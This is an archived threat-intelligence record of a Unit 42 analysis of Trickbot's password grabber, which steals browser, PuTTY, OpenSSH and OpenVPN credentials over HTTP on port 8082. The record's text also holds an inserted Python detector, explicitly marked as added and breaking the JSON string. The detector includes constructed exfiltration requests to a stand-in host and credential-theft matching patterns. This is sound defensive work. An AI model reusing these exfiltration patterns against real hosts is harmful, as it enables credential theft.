{
	"id": "e6a7e49b-aa09-46f3-a276-78e3edee2351",
	"created_at": "2026-04-06T00:10:02.499189Z",
	"updated_at": "2026-04-10T03:20:29.944134Z",
	"deleted_at": null,
	"sha1_hash": "edb7a1b5af3e7e1fe77ea7be76900953b2d68795",
	"title": "Trickbot Updates Password Grabber Module",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 12271160,
	"plain_text": "Trickbot Updates Password Grabber Module\r\nBy Brad Duncan\r\nPublished: 2019-11-22 · Archived: 2026-04-05 17:56:16 UTC\r\nFirst seen in 2016, Trickbot is malware that steals system information, login credentials, and other sensitive data from vulnerable Windows hosts. Trickbot is modular, and one of its modules is a password grabber. In November 2019, we started seeing indicators that Trickbot's password grabber targets data from the OpenSSH and OpenVPN applications.\r\nTrickbot Modules\r\nA Windows host infected with Trickbot downloads different modules to perform various functions. These modules are stored as encrypted binaries in a folder under the infected user’s AppData\\Roaming directory. The encrypted binaries are decrypted into DLLs and loaded directly into memory. Figure 1 shows the encrypted Trickbot modules left by a recent infection on a 64-bit Windows 7 host on Friday, November 8th, 2019.\r\nFigure 1. Modules from a Trickbot infection on November 8th, 2019.\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 1 of 7\n\nPassword Grabber Module\r\nAs seen in Figure 1, one of the modules is named pwgrab64. This is the password grabber used by Trickbot. The module retrieves login credentials saved by the victim's browser, and it also obtains login credentials from other applications installed on the victim’s host. The password grabber and some other Trickbot modules send stolen data using unencrypted HTTP over TCP port 8082 to an IP address used by Trickbot, so the stolen data is visible in clear text on the wire. For example, Figure 2 shows information from a packet capture (pcap) of traffic generated by a host infected with Trickbot. It highlights an example of login credentials stolen from an infected user’s Chrome browser. Note how the URL in the HTTP POST request ends with the number 81. This number is used in URLs generated by Trickbot's password grabber module, which makes it a useful marker for separating password grabber reports from other Trickbot traffic on the same port.\r\nFigure 2. 
Login credentials stolen from an infected user’s Chrome browser.\r\nUpdates to Password Grabber\r\nTraffic patterns from recent Trickbot infections had been fairly consistent until early November 2019, when we started seeing two new HTTP POST requests caused by the password grabber. They are identified by the strings:\r\nOpenSSH private keys\r\nOpenVPN passwords and configsls\r\nIn the OpenVPN line, configsls might be a misspelling of configs. Figure 3 and Figure 4 show examples of HTTP POST requests that contain these identifiers.\r\nFigure 3. HTTP POST request caused by Trickbot's password grabber for OpenSSH private keys.\r\nFigure 4. HTTP POST request caused by Trickbot's password grabber for OpenVPN passwords and configurations.\r\nAre These Updates Broken?\r\nThese updates to Trickbot's password grabber module may not be fully functional. The HTTP POST requests for OpenSSH and OpenVPN occur whether or not the victim's host has OpenSSH or OpenVPN installed, and we have not seen this traffic contain any actual data.\r\nWe generated Trickbot infections in lab environments on both Windows 7 and Windows 10 hosts with OpenSSH and OpenVPN installed and configured. We did not see any working results: the HTTP POST requests generated by the password grabber for OpenSSH and OpenVPN during these infections contained no data.\r\nHowever, Trickbot’s password grabber does successfully grab SSH passwords and private keys from PuTTY, an SSH/Telnet client. 
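The traffic pattern described above (plaintext HTTP POSTs to TCP port 8082 whose URL ends in 81, plus the two new identifier strings) can be turned into a simple detector. The following is an added example, not code from the Unit 42 post and not Trickbot's own code; it runs over constructed request texts embedded in the block. The port, the trailing 81 and the two identifier strings come from the post; the URL path layout, the body layout (identifier as a line of the body, remaining lines as exfiltrated content), the PPK-style lines and the 198.51.100.7 address are assumptions made for the example.

```python
# Added example (not Trickbot code, not from the Unit 42 post): a small
# detector for the password grabber traffic pattern the post describes,
# run over constructed HTTP requests. Port 8082, the trailing 81 and the
# two identifier strings come from the post; the path layout, the body
# layout and the 198.51.100.7 address (TEST-NET-2) are assumptions.
import re

PWGRAB_PORT = 8082                     # plaintext HTTP port used by several modules
PWGRAB_PATH = re.compile('/81/?$')     # password grabber URLs end with 81
IDENTIFIERS = {                        # new report types seen in November 2019
    'OpenSSH private keys': 'openssh-keys',
    'OpenVPN passwords and configsls': 'openvpn-configs',
}


def parse_request(raw):
    # Minimal HTTP/1.1 request parser: request line, headers, blank line, body.
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    i = 1
    while i < len(lines) and lines[i].strip():
        name, _, value = lines[i].partition(':')
        headers[name.strip().lower()] = value.strip()
        i += 1
    body = chr(10).join(lines[i + 1:])
    host, _, port_text = headers.get('host', '').rpartition(':')
    if not host:                       # no explicit port: plain HTTP default
        host, port_text = port_text, '80'
    return {'method': method, 'path': path, 'host': host,
            'port': int(port_text), 'body': body}


def classify(req):
    # Returns a finding for password grabber reports, None for anything else.
    if req['method'] != 'POST' or req['port'] != PWGRAB_PORT:
        return None
    if not PWGRAB_PATH.search(req['path']):
        return None                    # other modules use 8082 too, but without the 81
    label = 'browser-or-app-credentials'
    payload = []
    for line in req['body'].splitlines():
        text = line.strip()
        if not text:
            continue
        if text in IDENTIFIERS:
            label = IDENTIFIERS[text]  # marker line names an OpenSSH/OpenVPN report
        else:
            payload.append(text)       # anything else is exfiltrated content
    return {'host': req['host'], 'path': req['path'], 'label': label,
            'has_data': bool(payload), 'payload_lines': len(payload)}


def scan(raw_requests):
    findings = []
    for raw in raw_requests:
        finding = classify(parse_request(raw))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample traffic; nothing below is a real capture or a real secret.
SAMPLE_REQUESTS = [
    # 1. saved browser logins: a report that actually carries data
    '''POST /campaign1/host-id/81/ HTTP/1.1
Host: 198.51.100.7:8082
Content-Type: text/plain

url=https://mail.example.test/
login=alice
pass=placeholder-not-a-real-secret
''',
    # 2. the new OpenSSH report: marker only, no key material
    '''POST /campaign1/host-id/81/ HTTP/1.1
Host: 198.51.100.7:8082

OpenSSH private keys
''',
    # 3. the new OpenVPN report: marker only
    '''POST /campaign1/host-id/81/ HTTP/1.1
Host: 198.51.100.7:8082

OpenVPN passwords and configsls
''',
    # 4. a PuTTY private key file being exfiltrated (constructed contents)
    '''POST /campaign1/host-id/81/ HTTP/1.1
Host: 198.51.100.7:8082

PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20191108
Public-Lines: 1
AAAAB3NzaC1yc2EAAAADAQABAAAAgQ
''',
    # 5. another module reporting on 8082 without the trailing 81
    '''POST /campaign1/host-id/23/ HTTP/1.1
Host: 198.51.100.7:8082

''',
    # 6. ordinary web traffic on port 80
    '''GET /index.html HTTP/1.1
Host: www.example.test

''',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Run as a script, the block prints one finding per password grabber report; the OpenSSH and OpenVPN entries come back with has_data set to False, mirroring the empty reports the post observed, while the browser and PuTTY reports carry payload lines. A real deployment would feed it reassembled HTTP from a pcap or proxy log rather than the inline samples.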
Figure 5 and Figure 6 show password grabber activity from a Trickbot-infected host with PuTTY installed and configured to use a private key for an SSH connection to a cloud server.\r\nFigure 5. HTTP POST request caused by Trickbot's password grabber for PuTTY passwords.\r\nFigure 6. HTTP POST request caused by Trickbot's password grabber for private keys used by PuTTY.\r\nConclusion\r\nThis blog post documents recent changes in Trickbot traffic patterns that indicate updates to its password grabber module. These updates appear to target data from OpenSSH and OpenVPN applications, but this functionality does not appear to work. Regardless, Trickbot's password grabber will grab sensitive data such as private keys from SSH-related applications like PuTTY, so a Trickbot infection on a host with stored SSH keys or VPN credentials should be treated as a compromise of those credentials, and they should be rotated.\r\nThese updated traffic patterns demonstrate that Trickbot continues to evolve. However, best security practices like running fully-patched and up-to-date versions of Microsoft Windows will hinder or stop Trickbot infections. Palo Alto Networks customers are further protected from Trickbot by our threat prevention platform. AutoFocus users can track Trickbot activity by using the Trickbot tag.\r\nSource: https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/"
	],
	"report_names": [
		"trickbot-updates-password-grabber-module"
	],
	"threat_actors": [],
	"ts_created_at": 1775434202,
	"ts_updated_at": 1775791229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/edb7a1b5af3e7e1fe77ea7be76900953b2d68795.pdf",
		"text": "https://archive.orkl.eu/edb7a1b5af3e7e1fe77ea7be76900953b2d68795.txt",
		"img": "https://archive.orkl.eu/edb7a1b5af3e7e1fe77ea7be76900953b2d68795.jpg"
	}
}